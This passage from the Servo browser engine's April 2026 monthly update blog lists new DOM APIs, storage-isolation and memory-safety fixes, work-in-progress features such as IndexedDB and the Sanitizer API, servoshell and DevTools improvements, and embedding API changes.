<li><strong>get­Context(<code>"webgl"</code>)</strong> on <strong>Offscreen­Canvas</strong> (<a href="https://github.com/niyabits">@niyabits</a>, <a href="https://github.com/servo/servo/pull/44159">#44159</a>)</li>
<li>the <strong>detail</strong> property on <strong>Performance­Mark</strong> and <strong>Performance­Measure</strong> (<a href="https://github.com/shubhamg13">@shubhamg13</a>, <a href="https://github.com/servo/servo/pull/44289">#44289</a>, <a href="https://github.com/servo/servo/pull/44272">#44272</a>)</li>
</ul>
<p>Plus a bunch of new DOM APIs:</p>
<ul>
<li><strong>‘selectionchange’</strong> events on &lt;input&gt; and &lt;textarea&gt; (<a href="https://github.com/TimvdLippe">@TimvdLippe</a>, <a href="https://github.com/servo/servo/pull/44461">#44461</a>)</li>
<li><strong>Storage­Manager</strong>, in experimental mode (<a href="https://github.com/Taym95">@Taym95</a>, <a href="https://github.com/servo/servo/pull/43976">#43976</a>)</li>
<li><strong>active­Element</strong> on <strong>Document</strong> and <strong>Shadow­Root</strong> (<a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/43861">#43861</a>)</li>
<li><strong>crypto.subtle.supports()</strong> (<a href="https://github.com/kkoyung">@kkoyung</a>, <a href="https://github.com/servo/servo/pull/43703">#43703</a>) – Servo is the first major browser engine to support this!</li>
<li><strong>cell­Padding</strong>, <strong>cell­Spacing</strong>, and <strong>align</strong> properties on <strong>HTML­Table­Element</strong> (<a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/43903">#43903</a>) – previously supported in HTML only</li>
<li><strong>related­Target</strong> on <strong>‘focus’</strong> and <strong>‘blur’</strong> events (<a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/43926">#43926</a>)</li>
<li><strong>transfer­From­Image­Bitmap()</strong> on <strong>Image­Bitmap­Rendering­Context</strong> (<a href="https://github.com/Messi002">@Messi002</a>, <a href="https://github.com/servo/servo/pull/43984">#43984</a>)</li>
</ul>
<p>Servo’s support for text in <strong>Chinese</strong>, <strong>Japanese</strong>, and <strong>Korean</strong> languages has improved, with correct wrapping in the layout engine (<a href="https://github.com/SharanRP">@SharanRP</a>, <a href="https://github.com/servo/servo/pull/43744">#43744</a>), and CJK fonts now enabled in servoshell’s browser UI on Windows, Linux, and FreeBSD (<a href="https://github.com/yezhizhen">@yezhizhen</a>, <a href="https://github.com/CynthiaOketch">@CynthiaOketch</a>, <a href="https://github.com/nortti0">@nortti0</a>, <a href="https://github.com/servo/servo/pull/44055">#44055</a>, <a href="https://github.com/servo/servo/pull/44138">#44138</a>, <a href="https://github.com/servo/servo/pull/44514">#44514</a>).</p>
<p>Navigating to a <strong>JSON file</strong> as the top-level document now renders the JSON with an <strong>interactive pretty-printer</strong> (<a href="https://github.com/webbeef">@webbeef</a>, <a href="https://github.com/TimvdLippe">@TimvdLippe</a>, <a href="https://github.com/servo/servo/pull/43702">#43702</a>).</p>
<p>April was a big milestone for Servo, with some automated tests failing because they had hard-coded cookie expiry dates set to April 2016 plus ten years.
Surprise!
We’re still here.
Here’s to the next 100 years of Servo (<a href="https://github.com/jdm">@jdm</a>, <a href="https://github.com/servo/servo/pull/44341">#44341</a>).</p>
<p>This is another big update, so here’s an outline:</p>
<ul>
<li>
<p><a href="https://servo.org/blog/2026/05/31/april-in-servo/#security"><strong>Security</strong></a></p>
</li>
<li>
<p><a href="https://servo.org/blog/2026/05/31/april-in-servo/#work-in-progress"><strong>Work in progress</strong></a></p>
</li>
<li>
<p><a href="https://servo.org/blog/2026/05/31/april-in-servo/#servoshell"><strong>servoshell</strong></a></p>
</li>
<li>
<p><a href="https://servo.org/blog/2026/05/31/april-in-servo/#for-developers"><strong>For developers</strong></a></p>
</li>
<li>
<p><a href="https://servo.org/blog/2026/05/31/april-in-servo/#embedding-api"><strong>Embedding API</strong></a></p>
</li>
<li>
<p><a href="https://servo.org/blog/2026/05/31/april-in-servo/#more-on-the-web-platform"><strong>More on the web platform</strong></a></p>
</li>
<li>
<p><a href="https://servo.org/blog/2026/05/31/april-in-servo/#performance-and-stability"><strong>Performance and stability</strong></a></p>
</li>
</ul>
<h3>Security <a class="header-anchor" href="https://servo.org/blog/2026/05/31/april-in-servo/#security">
        <span class="icon hashlink"><i class="fas fa-link"></i></span>
      </a></h3>
<p><strong>Crypto­Key</strong> now zeroes buffers containing key material after use (<a href="https://github.com/kkoyung">@kkoyung</a>, <a href="https://github.com/servo/servo/pull/44597">#44597</a>).</p>
<p>With only a few exceptions, you can only access DOM APIs in another document if that document is in the <strong>same origin</strong>.
But if that document is in the same <em>site</em> with a different port number, Servo currently allows these accesses even though it shouldn’t.
We’ve fixed some (but not all) of these incorrect accesses, specifically those that involve binding a Window or Location method in this document with a <code>this</code> from the other document (<a href="https://github.com/yvt">@yvt</a>, <a href="https://github.com/jdm">@jdm</a>, <a href="https://github.com/servo/servo/pull/28583">#28583</a>).</p>
<p>We’ve fixed a bug where <strong>local­Storage</strong> and <strong>session­Storage</strong> were usable in <strong>sandboxed &lt;iframe&gt;</strong> and shared with every other sandboxed &lt;iframe&gt;, rather than throwing Security­Error (<a href="https://github.com/Taym95">@Taym95</a>, <a href="https://github.com/servo/servo/pull/44002">#44002</a>).</p>
<p>We’ve fixed a bug where <strong>local­Storage</strong> and <strong>session­Storage</strong> were shared between all <strong>&lt;iframe srcdoc&gt; documents</strong>, rather than isolated using the origin of the containing document (<a href="https://github.com/niyabits">@niyabits</a>, <a href="https://github.com/servo/servo/pull/43988">#43988</a>, <a href="https://github.com/servo/servo/pull/44038">#44038</a>).</p>
<p>We’ve fixed a bug where <strong>IndexedDB</strong> was usable in <strong>sandboxed &lt;iframe&gt;</strong> and <strong>data: URL web workers</strong> (<a href="https://github.com/Taym95">@Taym95</a>, <a href="https://github.com/servo/servo/pull/44088">#44088</a>).</p>
<p>We’ve fixed a bug where pages in some <strong>IP address origins</strong> can evict cookies from other IP address origins (<a href="https://github.com/officialasishkumar">@officialasishkumar</a>, <a href="https://github.com/servo/servo/pull/44152">#44152</a>).
Only evicting cookies was possible, not reading or writing them.</p>
<p>We’ve fixed an <strong>out-of-bounds memory read</strong> in <strong>tex­Image3D()</strong> on <strong>Web­GL2­Rendering­Context</strong> (<a href="https://github.com/simartin">@simartin</a>, <a href="https://github.com/servo/servo/pull/44270">#44270</a>), and fixed some undefined behaviour in servoshell’s signal handler (<a href="https://github.com/Narfinger">@Narfinger</a>, <a href="https://github.com/servo/servo/pull/43891">#43891</a>).</p>
<h3>Work in progress <a class="header-anchor" href="https://servo.org/blog/2026/05/31/april-in-servo/#work-in-progress">
        <span class="icon hashlink"><i class="fas fa-link"></i></span>
      </a></h3>
<p><strong>IndexedDB</strong> is now enabled in servoshell’s experimental mode (<a href="https://github.com/arihant2math">@arihant2math</a>, <a href="https://github.com/servo/servo/pull/44245">#44245</a>).
As always, embedders can enable it with <a href="https://doc.servo.org/servo/struct.Preferences.html"><code>Preferences</code></a>::<a href="https://doc.servo.org/servo/struct.Preferences.html#structfield.dom_indexeddb_enabled"><code>dom­_indexeddb­_enabled</code></a> (<a href="https://github.com/arihant2math">@arihant2math</a>, <a href="https://github.com/servo/servo/pull/44245">#44245</a>, <a href="https://github.com/servo/servo/pull/44283">#44283</a>).</p>
<p>IndexedDB now uses Servo’s new <strong>“client storage”</strong> system, which is based on the <a href="https://storage.spec.whatwg.org/">Storage Standard</a> and will allow us to have a unified on-disk format and quota management for all web platform features that persistently store data (<a href="https://github.com/gterzian">@gterzian</a>, <a href="https://github.com/servo/servo/pull/44374">#44374</a>, <a href="https://github.com/servo/servo/pull/43900">#43900</a>).
We’ve also made key range queries more efficient (<a href="https://github.com/arihant2math">@arihant2math</a>, <a href="https://github.com/servo/servo/pull/39009">#39009</a>), landed improvements to IDB­Database, IDB­Object­Store, IDB­Cursor, IDB­Key­Range, IDB­Request, and to the handling of transactions, keys, values, and exceptions (<a href="https://github.com/Taym95">@Taym95</a>, <a href="https://github.com/servo/servo/pull/44128">#44128</a>, <a href="https://github.com/servo/servo/pull/43901">#43901</a>, <a href="https://github.com/servo/servo/pull/44009">#44009</a>, <a href="https://github.com/servo/servo/pull/43914">#43914</a>, <a href="https://github.com/servo/servo/pull/44161">#44161</a>, <a href="https://github.com/servo/servo/pull/44183">#44183</a>, <a href="https://github.com/servo/servo/pull/44059">#44059</a>, <a href="https://github.com/servo/servo/pull/44215">#44215</a>, <a href="https://github.com/servo/servo/pull/42998">#42998</a>, <a href="https://github.com/servo/servo/pull/43805">#43805</a>).</p>
<p>We’ve made more progress on the <strong>Intersection­Observer API</strong>, under <code>--pref dom­_intersection­_observer­_enabled</code> (<a href="https://github.com/stevennovaryo">@stevennovaryo</a>, <a href="https://github.com/jdm">@jdm</a>, <a href="https://github.com/servo/servo/pull/42204">#42204</a>).</p>
<p>We’re continuing to implement <strong>document.exec­Command()</strong> for <strong>rich text editing</strong> (<a href="https://github.com/TimvdLippe">@TimvdLippe</a>, <a href="https://github.com/servo/servo/pull/44529">#44529</a>), under <code>--pref dom­_exec­_command­_enabled</code>.
This release adds support for the <strong>‘bold’</strong>, <strong>‘font­Name’</strong>, <strong>‘font­Size’</strong>, <strong>‘italic’</strong>, <strong>‘strikethrough’</strong>, and <strong>‘underline’</strong> commands (<a href="https://github.com/TimvdLippe">@TimvdLippe</a>, <a href="https://github.com/jdm">@jdm</a>, <a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/44511">#44511</a>, <a href="https://github.com/servo/servo/pull/43287">#43287</a>, <a href="https://github.com/servo/servo/pull/44432">#44432</a>, <a href="https://github.com/servo/servo/pull/44410">#44410</a>, <a href="https://github.com/servo/servo/pull/44194">#44194</a>, <a href="https://github.com/servo/servo/pull/44030">#44030</a>, <a href="https://github.com/servo/servo/pull/44039">#44039</a>, <a href="https://github.com/servo/servo/pull/44041">#44041</a>, <a href="https://github.com/servo/servo/pull/44075">#44075</a>, <a href="https://github.com/servo/servo/pull/44234">#44234</a>, <a href="https://github.com/servo/servo/pull/44250">#44250</a>, <a href="https://github.com/servo/servo/pull/44331">#44331</a>, <a href="https://github.com/servo/servo/pull/44390">#44390</a>, <a href="https://github.com/servo/servo/pull/44137">#44137</a>, <a href="https://github.com/servo/servo/pull/44293">#44293</a>, <a href="https://github.com/servo/servo/pull/44312">#44312</a>, <a href="https://github.com/servo/servo/pull/44347">#44347</a>).</p>
<p>All of the features above are enabled in servoshell’s experimental mode.</p>
<p>Servo can now build a very basic <strong>accessibility tree</strong> for web contents, under <code>--pref accessibility­_enabled</code> (<a href="https://github.com/alice">@alice</a>, <a href="https://github.com/delan">@delan</a>, <a href="https://github.com/lukewarlow">@lukewarlow</a>, <a href="https://github.com/servo/servo/pull/42338">#42338</a>, <a href="https://github.com/servo/servo/pull/43558">#43558</a>, <a href="https://github.com/servo/servo/pull/44437">#44437</a>, <a href="https://github.com/servo/servo/pull/44438">#44438</a>).
This includes text runs, plus nine other non-interactive accessibility roles (<a href="https://github.com/alice">@alice</a>, <a href="https://github.com/delan">@delan</a>, <a href="https://github.com/servo/servo/pull/44255">#44255</a>).
We’ve also fixed a crash when reloading pages with accessibility enabled (<a href="https://github.com/alice">@alice</a>, <a href="https://github.com/servo/servo/pull/44473">#44473</a>), and made accessibility tree updates more efficient (<a href="https://github.com/alice">@alice</a>, <a href="https://github.com/servo/servo/pull/44208">#44208</a>).</p>
<p>We’ve started implementing the <strong>Sanitizer API</strong>, under <code>--pref dom­_sanitizer­_enabled</code> (<a href="https://github.com/kkoyung">@kkoyung</a>, <a href="https://github.com/servo/servo/pull/44198">#44198</a>, <a href="https://github.com/servo/servo/pull/44290">#44290</a>, <a href="https://github.com/servo/servo/pull/44335">#44335</a>, <a href="https://github.com/servo/servo/pull/44421">#44421</a>, <a href="https://github.com/servo/servo/pull/44452">#44452</a>, <a href="https://github.com/servo/servo/pull/44481">#44481</a>, <a href="https://github.com/servo/servo/pull/44585">#44585</a>, <a href="https://github.com/servo/servo/pull/44594">#44594</a>).</p>
<p>We’ve also started implementing <strong>Shared­Worker</strong>, under <code>--pref dom­_sharedworker­_enabled</code> (<a href="https://github.com/Taym95">@Taym95</a>, <a href="https://github.com/servo/servo/pull/44375">#44375</a>, <a href="https://github.com/servo/servo/pull/44440">#44440</a>).</p>
<p>We’re working on the <strong>Wake­Lock API</strong> too, under <code>--pref dom­_wakelock­_enabled</code> (<a href="https://github.com/TG199">@TG199</a>, <a href="https://github.com/rovertrack">@rovertrack</a>, <a href="https://github.com/servo/servo/pull/43617">#43617</a>, <a href="https://github.com/servo/servo/pull/44343">#44343</a>).</p>
<h3>servoshell <a class="header-anchor" href="https://servo.org/blog/2026/05/31/april-in-servo/#servoshell">
        <span class="icon hashlink"><i class="fas fa-link"></i></span>
      </a></h3>
<p>servoshell for Android now has a <strong>revamped browser UI</strong>, including a new <strong>history view</strong> (<a href="https://github.com/espy">@espy</a>, <a href="https://github.com/servo/servo/pull/43795">#43795</a>), the <strong>apk is 30% smaller</strong> (<a href="https://github.com/jschwe">@jschwe</a>, <a href="https://github.com/servo/servo/pull/44278">#44278</a>, <a href="https://github.com/servo/servo/pull/44182">#44182</a>), and we’ve fixed the black screen bug when closing settings or switching back from another app (<a href="https://github.com/yezhizhen">@yezhizhen</a>, <a href="https://github.com/servo/servo/pull/44327">#44327</a>).
You can now close tabs on OpenHarmony too (<a href="https://github.com/Narfinger">@Narfinger</a>, <a href="https://github.com/servo/servo/pull/42713">#42713</a>).</p>
<figure>
    <a href="https://servo.org/img/blog/2026-05-android.png"><img alt="servoshell 0.2.0 showing the revamped browser UI on Android. from left to right: viewing a web page, the settings view, the history view" src="https://servo.org/img/blog/2026-05-android.png"></a>
</figure>
<p>As for servoshell on desktop platforms, we’ve fixed some focus- and IME-related bugs (<a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/43872">#43872</a>, <a href="https://github.com/servo/servo/pull/43932">#43932</a>), and on Windows, we now install a normal shortcut without the strange behaviour of an “advertised” shortcut (<a href="https://github.com/yezhizhen">@yezhizhen</a>, <a href="https://github.com/servo/servo/pull/44223">#44223</a>).</p>
<h3>For developers <a class="header-anchor" href="https://servo.org/blog/2026/05/31/april-in-servo/#for-developers">
        <span class="icon hashlink"><i class="fas fa-link"></i></span>
      </a></h3>
<p>When using the <strong>Inspector</strong> tab in the Firefox <strong>DevTools</strong>, the <strong>Rules</strong> panel now includes declarations in <strong>‘@layer’ rules</strong> (<a href="https://github.com/arabson99">@arabson99</a>, <a href="https://github.com/servo/servo/pull/43912">#43912</a>).</p>
<p>When <strong>logging expressions</strong> in the <strong>Console</strong> tab, and when <strong>hovering over symbols</strong> in the <strong>Debugger</strong> tab, you can now get more information about the contents of functions, arrays, objects, and other values (<a href="https://github.com/atbrakhi">@atbrakhi</a>, <a href="https://github.com/eerii">@eerii</a>, <a href="https://github.com/servo/servo/pull/44172">#44172</a>, <a href="https://github.com/servo/servo/pull/44173">#44173</a>, <a href="https://github.com/servo/servo/pull/44022">#44022</a>, <a href="https://github.com/servo/servo/pull/44233">#44233</a>, <a href="https://github.com/servo/servo/pull/44196">#44196</a>, <a href="https://github.com/servo/servo/pull/44181">#44181</a>, <a href="https://github.com/servo/servo/pull/44064">#44064</a>, <a href="https://github.com/servo/servo/pull/44023">#44023</a>, <a href="https://github.com/servo/servo/pull/44164">#44164</a>, <a href="https://github.com/servo/servo/pull/44369">#44369</a>, <a href="https://github.com/servo/servo/pull/44262">#44262</a>).</p>
<p>When using the <strong>Debugger</strong> tab, you can now use the <strong>Scopes</strong> panel to inspect local and global variables (<a href="https://github.com/eerii">@eerii</a>, <a href="https://github.com/atbrakhi">@atbrakhi</a>, <a href="https://github.com/servo/servo/pull/43792">#43792</a>, <a href="https://github.com/servo/servo/pull/43791">#43791</a>), you can now debug <strong>web worker</strong> scripts (<a href="https://github.com/atbrakhi">@atbrakhi</a>, <a href="https://github.com/servo/servo/pull/43981">#43981</a>), and we’ve started implementing <strong>blackboxing</strong>, aka the <strong>Ignore source</strong> button (<a href="https://github.com/freyacodes">@freyacodes</a>, <a href="https://github.com/servo/servo/pull/44142">#44142</a>).</p>
<p>We’ve also landed some initial support for the <strong>Style Editor</strong> tab (<a href="https://github.com/rovertrack">@rovertrack</a>, <a href="https://github.com/servo/servo/pull/44517">#44517</a>, <a href="https://github.com/servo/servo/pull/44462">#44462</a>).</p>
<p>We’re working towards re-enabling our automated DevTools tests in CI, which should make the feature more reliable (<a href="https://github.com/freyacodes">@freyacodes</a>, <a href="https://github.com/servo/servo/pull/44577">#44577</a>), and we’ve landed a small build reproducibility fix too (<a href="https://github.com/jschwe">@jschwe</a>, <a href="https://github.com/servo/servo/pull/44459">#44459</a>).</p>
<p>For developers of Servo itself, please note that the <strong>Cargo ‘release’ profile</strong> is no longer <code>#[cfg(debug­_assertions)]</code> (<a href="https://github.com/jschwe">@jschwe</a>, <a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/44177">#44177</a>).
If you’ve been using ‘release’ as a “faster ‘debug’ with assertions” build locally, consider switching to ‘checked-release’ or ‘medium’.</p>
<p>The pull request template has been updated (<a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/44135">#44135</a>).
<strong>‘Testing’</strong> and <strong>‘Fixes’</strong> should go at the <em>bottom</em> of the PR description, and <strong>‘Testing’</strong> is about automated tests, not how you tested the PR locally.</p>
<p>We’ve made more progress on the new <a href="https://containers.dev/"><strong>dev container</strong></a>, which will provide an alternative to <a href="https://book.servo.org/building/building.html">our usual procedures</a> for setting up a Servo build environment (<a href="https://github.com/jschwe">@jschwe</a>, <a href="https://github.com/sagudev">@sagudev</a>, <a href="https://github.com/servo/servo/pull/44126">#44126</a>, <a href="https://github.com/servo/servo/pull/44111">#44111</a>, <a href="https://github.com/servo/servo/pull/44162">#44162</a>, <a href="https://github.com/servo/servo/pull/44641">#44641</a>, <a href="https://github.com/servo/servo/pull/44109">#44109</a>).
Keep an eye out for that <a href="https://book.servo.org/building/building.html">in the book</a>!</p>
<p>In the meantime, did you know that you can use <a href="https://lix.systems/"><strong>Lix</strong></a> or <a href="https://nixos.org/manual/nix/stable"><strong>Nix</strong></a> to build Servo on Linux with a lot less hassle, <em>even if</em> you’re not using NixOS?
For now at least, head to the <a href="https://book.servo.org/building/nixos.html">NixOS page</a> in the book to learn more.
We’ve also fixed a regression that made <code>--debug-mozjs</code> and <code>MOZJS­_FROM­_SOURCE</code> builds take much longer to complete on Linux when not using Nix (<a href="https://github.com/jschwe">@jschwe</a>, <a href="https://github.com/servo/servo/pull/44346">#44346</a>).</p>
<p>We’ve fixed building Servo with the <strong>‘jitspew’ feature</strong> in mozjs, allowing you to set <strong>IONFLAGS</strong> to enable JIT logging (<a href="https://github.com/simonwuelker">@simonwuelker</a>, <a href="https://github.com/servo/servo/pull/44010">#44010</a>).
We’ve also fixed build issues on Windows and FreeBSD (<a href="https://github.com/zhangxichang">@zhangxichang</a>, <a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/44264">#44264</a>, <a href="https://github.com/servo/servo/pull/44591">#44591</a>).</p>
<h3>Embedding API <a class="header-anchor" href="https://servo.org/blog/2026/05/31/april-in-servo/#embedding-api">
        <span class="icon hashlink"><i class="fas fa-link"></i></span>
      </a></h3>
<p>With this second monthly release of the Servo library, we have some quick notes about <strong>API stability</strong> and <strong>semver compatibility</strong>:</p>
<ul>
<li>
<p><strong>The <a href="https://crates.io/crates/servo">‘servo’</a> package</strong> follows <a href="https://doc.rust-lang.org/1.88.0/cargo/reference/specifying-dependencies.html#default-requirements">Cargo’s rules for semver compatibility</a>.
0.1.1 is compatible with version 0.1.0, but 0.2.0 is a breaking update.</p>
</li>
<li>
<p>Until we integrate semver analysis into our release process, each monthly release will have a breaking version number, while non-breaking version numbers may be used for LTS updates.</p>
</li>
<li>
<p>In general, <strong>dependencies of ‘servo’</strong>, like <a href="https://crates.io/crates/servo-base">‘servo-base’</a> and <a href="https://crates.io/crates/servo-script">‘servo-script’</a>, <strong>do not use semver</strong>.
Any release may include breaking changes.</p>
</li>
</ul>
<p>We’ve fixed a <strong>build failure</strong> affecting embedders with a <strong>new or updated Cargo.lock</strong> (<a href="https://github.com/jschwe">@jschwe</a>, <a href="https://github.com/servo/servo/pull/44093">#44093</a>), and landed several other changes to help us with the Servo library release process (<a href="https://github.com/jschwe">@jschwe</a>, <a href="https://github.com/mukilan">@mukilan</a>, <a href="https://github.com/servo/servo/pull/43972">#43972</a>, <a href="https://github.com/servo/servo/pull/44642">#44642</a>, <a href="https://github.com/servo/servo/pull/43182">#43182</a>, <a href="https://github.com/servo/servo/pull/43866">#43866</a>, <a href="https://github.com/servo/servo/pull/44086">#44086</a>, <a href="https://github.com/servo/servo/pull/43797">#43797</a>).</p>
<p>Breaking changes:</p>
<ul>
<li>
<p><a href="https://doc.servo.org/servo/struct.WebView.html"><code>Web­View</code></a>::<a href="https://doc.servo.org/servo/struct.WebView.html#method.animating"><code>animating</code></a> now takes <code>&amp;self</code> instead of <code>self</code>, so you can call it without cloning the handle (<a href="https://github.com/JavaDerg">@JavaDerg</a>, <a href="https://github.com/servo/servo/pull/44253">#44253</a>)</p>
</li>
<li>
<p><a href="https://doc.servo.org/servo/struct.Servo.html"><code>Servo</code></a>::<a href="https://doc.servo.org/servo/struct.Servo.html#method.site_data_manager"><code>site­_data­_manager</code></a> now returns <code>&amp;SiteDataManager</code> instead of <code>Ref&lt;'_, SiteDataManager&gt;</code> (<a href="https://github.com/sabbCodes">@sabbCodes</a>, <a href="https://github.com/servo/servo/pull/44116">#44116</a>)</p>
</li>
<li>
<p><a href="https://doc.servo.org/servo/trait.WebViewDelegate.html"><code>Web­View­Delegate</code></a>::<code>play­_gamepad­_haptic­_effect</code> and <code>stop­_gamepad­_haptic­_effect</code> have been removed (<a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/43895">#43895</a>), but they have not worked since February 2026 – use <a href="https://doc.servo.org/servo/trait.GamepadDelegate.html"><code>Gamepad­Delegate</code></a> instead</p>
</li>
</ul>
<p>You can now load a URL with <strong>custom request headers</strong> by calling <a href="https://doc.servo.org/servo/struct.WebView.html"><code>Web­View</code></a>::<a href="https://doc.servo.org/servo/struct.WebView.html#method.load_request"><code>load­_request</code></a> (<a href="https://github.com/Narfinger">@Narfinger</a>, <a href="https://github.com/longvatrong111">@longvatrong111</a>, <a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/43338">#43338</a>).</p>
<p>You can now <strong>retrieve cookies asynchronously</strong> by calling <a href="https://doc.servo.org/servo/struct.SiteDataManager.html"><code>Site­Data­Manager</code></a>::<a href="https://doc.servo.org/servo/struct.SiteDataManager.html#method.cookies_for_url_async"><code>cookies­_for­_url­_async</code></a> (<a href="https://github.com/longvatrong111">@longvatrong111</a>, <a href="https://github.com/servo/servo/pull/43794">#43794</a>).</p>
<p>The synchronous version of that method, <a href="https://doc.servo.org/servo/struct.SiteDataManager.html"><code>Site­Data­Manager</code></a>::<a href="https://doc.servo.org/servo/struct.SiteDataManager.html#method.cookies_for_url"><code>cookies­_for­_url</code></a>, was previously not callable because <a href="https://doc.servo.org/servo/enum.CookieSource.html"><code>Cookie­Source</code></a> was not exposed to the public API, but we’ve fixed that now (<a href="https://github.com/TG199">@TG199</a>, <a href="https://github.com/servo/servo/pull/44124">#44124</a>).</p>
<p>You can now <strong>clear session cookies</strong> without clearing <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/Cookies#removal_defining_the_lifetime_of_a_cookie">permanent cookies</a> by calling <a href="https://doc.servo.org/servo/struct.SiteDataManager.html"><code>Site­Data­Manager</code></a>::<a href="https://doc.servo.org/servo/struct.SiteDataManager.html#method.clear_session_cookies"><code>clear­_session­_cookies</code></a> (<a href="https://github.com/longvatrong111">@longvatrong111</a>, <a href="https://github.com/servo/servo/pull/44166">#44166</a>).</p>
<p>When <strong>intercepting requests</strong> with <a href="https://doc.servo.org/servo/trait.ServoDelegate.html"><code>Servo­Delegate</code></a>:: and <a href="https://doc.servo.org/servo/trait.WebViewDelegate.html"><code>Web­View­Delegate</code></a>::<a href="https://doc.servo.org/servo/trait.WebViewDelegate.html#method.load_web_resource"><code>load­_web­_resource</code></a>, we now include a <a href="https://doc.servo.org/servo/struct.WebResourceRequest.html#structfield.destination"><code>destination</code></a> and <a href="https://doc.servo.org/servo/struct.WebResourceRequest.html#structfield.referrer_url"><code>referrer­_url</code></a> in the <a href="https://doc.servo.org/servo/struct.WebResourceRequest.html"><code>Web­Resource­Request</code></a>, which can be helpful if you’re implementing <strong>ad blocking</strong> (<a href="https://github.com/webbeef">@webbeef</a>, <a href="https://github.com/servo/servo/pull/44493">#44493</a>).</p>
<p>You can configure Servo to <strong>write all of its storage to a unique directory</strong> for that session by enabling <a href="https://doc.servo.org/servo/struct.Opts.html"><code>Opts</code></a>::<a href="https://doc.servo.org/servo/struct.Opts.html#structfield.temporary_storage"><code>temporary­_storage</code></a> (<a href="https://github.com/janvarga">@janvarga</a>, <a href="https://github.com/servo/servo/pull/44433">#44433</a>).
Note that these unique directories currently persist after Servo exits, so it’s an isolation feature, not a privacy feature.</p>
<p><a href="https://doc.servo.org/servo/struct.WindowRenderingContext.html"><code>Window­Rendering­Context</code></a>::<a href="https://doc.servo.org/servo/struct.WindowRenderingContext.html#method.new"><code>new</code></a> and <a href="https://doc.servo.org/servo/struct.SoftwareRenderingContext.html"><code>Software­Rendering­Context</code></a>::<a href="https://doc.servo.org/servo/struct.SoftwareRenderingContext.html#method.new"><code>new</code></a> now return an error if the given <code>size</code> is less than 1x1 (<a href="https://github.com/freyacodes">@freyacodes</a>, <a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/44011">#44011</a>).</p>
<p>We’ve improved our API docs for <a href="https://doc.servo.org/servo/struct.WebView.html"><code>Web­View</code></a>, <a href="https://doc.servo.org/servo/struct.WebViewBuilder.html"><code>Web­View­Builder</code></a>, <a href="https://doc.servo.org/servo/trait.WebViewDelegate.html"><code>Web­View­Delegate</code></a>, <a href="https://doc.servo.org/servo/trait.ServoDelegate.html"><code>ServoDelegate</code></a>, <a href="https://doc.servo.org/servo/struct.PromptDialog.html"><code>Prompt­Dialog</code></a>, <a href="https://doc.servo.org/servo/struct.WebResourceLoad.html"><code>Web­Resource­Load</code></a>, <a href="https://doc.servo.org/servo/webxr/trait.WebXrRegistry.html"><code>Web­Xr­Registry</code></a>, <a href="https://doc.servo.org/servo/struct.Preferences.html"><code>Preferences</code></a>, and servoshell’s <a href="https://doc.servo.org/servoshell/prefs/static.EXPERIMENTAL_PREFS.html"><code>EXPERIMENTAL­_PREFS</code></a> (<a href="https://github.com/simonwuelker">@simonwuelker</a>, <a href="https://github.com/TG199">@TG199</a>, <a href="https://github.com/sabbCodes">@sabbCodes</a>, <a href="https://github.com/jdm">@jdm</a>, <a href="https://github.com/rovertrack">@rovertrack</a>, <a href="https://github.com/servo/servo/pull/43892">#43892</a>, <a href="https://github.com/servo/servo/pull/43787">#43787</a>, <a href="https://github.com/servo/servo/pull/44171">#44171</a>, <a href="https://github.com/servo/servo/pull/43947">#43947</a>).</p>
<p>We’ve also improved our API docs for <a href="https://doc.servo.org/servo/struct.Opts.html"><code>Opts</code></a>, <a href="https://doc.servo.org/servo/enum.OutputOptions.html"><code>Output­Options</code></a>, <a href="https://doc.servo.org/servo/struct.DiagnosticsLogging.html"><code>Diagnostics­Logging</code></a>, <a href="https://doc.servo.org/servo/enum.PrefValue.html"><code>Pref­Value</code></a>, <a href="https://doc.servo.org/servo/index.html"><code>servo</code></a>::<a href="https://doc.servo.org/servo/opts/index.html"><code>opts</code></a>, and <a href="https://doc.servo.org/servo_config/index.html"><code>servo­_config</code></a> (<a href="https://github.com/mukilan">@mukilan</a>, <a href="https://github.com/servo/servo/pull/43802">#43802</a>).</p>
<h3>More on the web platform <a class="header-anchor" href="https://servo.org/blog/2026/05/31/april-in-servo/#more-on-the-web-platform">
        <span class="icon hashlink"><i class="fas fa-link"></i></span>
      </a></h3>
<p><strong><kbd>Tab</kbd> navigation</strong> now works across <strong>&lt;iframe&gt;</strong> boundaries (<a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/44397">#44397</a>), and <strong><kbd>Ctrl</kbd>+<kbd>Backspace</kbd></strong> (or <strong><kbd>⌥</kbd><kbd>⌫</kbd></strong>) now <strong>deletes a whole word</strong> in input fields (<a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/43940">#43940</a>).</p>
<p><strong>Tab characters</strong> are now rendered correctly in <strong>&lt;pre&gt;</strong> (and other elements with <strong>‘white-space: pre’</strong>), with proper tab stops (<a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/SimonSapin">@SimonSapin</a>, <a href="https://github.com/servo/servo/pull/44480">#44480</a>).
<strong>Spaces</strong> are now rendered correctly in <strong>2D &lt;canvas&gt;</strong>, instead of twice as wide as they should be (<a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/43899">#43899</a>).</p>
<p><strong>&lt;a href&gt;</strong> now correctly resolves the URL with the page encoding (<a href="https://github.com/sabbCodes">@sabbCodes</a>, <a href="https://github.com/servo/servo/pull/43822">#43822</a>).</p>
